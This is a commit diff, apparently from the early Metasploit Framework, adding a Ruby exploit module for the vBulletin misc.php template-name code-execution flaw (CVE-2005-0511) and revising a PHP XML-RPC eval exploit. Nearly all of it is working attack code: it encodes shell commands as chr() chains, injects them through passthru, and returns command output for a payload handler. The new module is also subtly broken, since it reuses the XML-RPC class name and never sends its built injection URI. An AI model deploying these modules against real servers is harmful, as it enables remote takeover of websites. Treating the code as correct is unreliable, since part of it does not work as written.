* wee, more php bullshit

git-svn-id: file:///home/svn/incoming/trunk@3448 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/unix/http/php_vbulletin_template.rb

@@ -0,0 +1,102 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
+
+	include Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'vBulletin misc.php Template Name Arbitrary Code Execution',
+			'Description'    => %q{
+				This module exploits an arbitrary PHP code execution flaw in
+				the vBulletin web forum software. This vulnerability is only
+				present when the "Add Template Name in HTML Comments" option
+				is enabled. All versions of vBulletin prior to 3.0.7 are
+				affected.
+			},
+			'Author'         => [ 'str0ke <str0ke@milw0rm.com>', 'cazz' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     => [
+    			[ 'OSVDB', '14047'],
+    			[ 'CVE', '2005-0511'],
+    			[ 'MIL', '81'],
+			],
+			'Privileged'     => false,
+            'Platform'       => ['unix', 'solaris'],
+			'Payload'        => {
+                    'Space' => 512,
+                    'DisableNops' => true,
+                    'Keys'  => ['cmd', 'cmd_bash'],
+				},
+            'Targets'        => [ ['Automatic', { }], ],
+            'DefaultTarget' => 0,
+			'DisclosureDate' => 'Feb 25 2005'
+            ))
+
+
+        register_options(
+            [
+                OptString.new('PATH', [ true,  "Path to misc.php", '/forum/misc.php']),
+            ], self.class
+            )
+	
+		deregister_options(
+			'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now. 
+			)
+	end
+
+	def go(command)
+        wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
+
+		command = "echo #{wrapper};#{command};echo #{wrapper};"
+
+        encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
+        
+		uri = datastore['PATH'] + "?do=page&template={${passthru(#{encoded})}}";
+
+        res = request({
+            'uri'          => datastore['PATH'],
+            'method'       => 'GET',
+        })
+
+        if (res and res.body)
+            b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
+            if b
+                return b.captures[0]
+            elsif datastore['HTTP::chunked'] == true
+                b = /chunked Transfer-Encoding forbidden/.match(res.body)
+                if b
+                    raise RuntimeError, 'Target PHP installation does not support chunked encoding.  Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
+                end
+            end
+        end
+
+        return nil
+	end
+    
+    def check
+        response = go("echo ownable")
+        if (!response.nil? and response =~ /ownable/sm)
+            return Exploit::CheckCode::Vulnerable
+        end
+        return Exploit::CheckCode::Safe
+    end
+
+    def exploit
+        response = go(payload.encoded)
+        if response == nil
+            print_status('exploit failed')
+		else
+    		if response.length == 0
+    			print_status('exploit successful')
+            else 
+                print_status("Command returned #{response}")
+    		end
+    		handler
+        end
+    end
+end	
+end

modules/exploits/unix/http/php_xmlrpc_eval.rb

@@ -43,10 +43,14 @@ class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
                 OptString.new('PATH', [ true,  "Path to xmlrpc.php", '/xmlrpc.php']),
             ], self.class
             )
+	
+		deregister_options(
+			'HTTP::junk_params', # not your typical POST, so don't inject params.
+			'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now. 
+			)
 	end
 
-	def go(command, do_handle = 1)
-        c = connect
+	def go(command)
 
         encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
         wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
@@ -63,25 +67,23 @@ class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
             "</param></params>" +
         "</methodCall>";
 
-        req = c.request({
+        res = request({
             'uri'          => datastore['PATH'],
             'method'       => 'POST',
             'Content-Type' => 'application/xml',
             'data'         => xml,
         })
 
-        res = c.send_request(req)
-
-        if do_handle
-    		handler
-        end
-
-        disconnect
 
         if (res and res.body)
             b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
             if b
                 return b.captures[0]
+            elsif datastore['HTTP::chunked'] == true
+                b = /chunked Transfer-Encoding forbidden/.match(res.body)
+                if b
+                    raise RuntimeError, 'Target PHP installation does not support chunked encoding.  Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
+                end
             end
         end
 
@@ -89,8 +91,8 @@ class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
 	end
     
     def check
-        response = go("echo ownable", nil)
-        if (response and response =~ /ownable/sm)
+        response = go("echo ownable")
+        if (!response.nil? and response =~ /ownable/sm)
             return Exploit::CheckCode::Vulnerable
         end
         return Exploit::CheckCode::Safe
@@ -100,8 +102,13 @@ class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
         response = go(payload.encoded)
         if response == nil
             print_status('exploit failed')
-        else 
-            print_status("Command returned #{response}")
+		else
+    		if response.length == 0
+    			print_status('exploit successful')
+            else 
+                print_status("Command returned #{response}")
+    		end
+    		handler
         end
     end
 end